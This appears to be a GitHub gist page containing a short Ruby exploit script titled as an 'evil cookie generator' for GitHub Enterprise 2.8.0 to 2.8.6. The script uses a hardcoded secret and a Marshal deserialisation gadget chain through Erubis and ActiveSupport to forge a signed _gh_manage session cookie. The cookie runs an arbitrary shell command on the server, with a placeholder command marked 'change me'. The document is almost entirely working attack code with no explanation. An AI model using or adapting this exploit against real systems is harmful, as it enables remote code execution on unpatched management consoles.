Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
GitHub Enterprise 2.8.0 < 2.8.6 evil cookie generator
require "openssl"
require "cgi"
SECRET = "641dd6454584ddabfed6342cc66281fb"
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
cmd = "uname -a > /tmp/owned" # change me
erubis = Erubis::Eruby.allocate
erubis.instance_variable_set :@src, "%x(#{cmd})"
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
proxy.instance_variable_set :@instance, erubis
proxy.instance_variable_set :@method, :result
proxy.instance_variable_set :@var, "@result"
session = {"session_id" => "", "exploit" => proxy}
dump = [Marshal.dump(session)].pack("m")
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
print "_gh_manage=#{CGI.escape("#{dump}--#{hmac}")}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment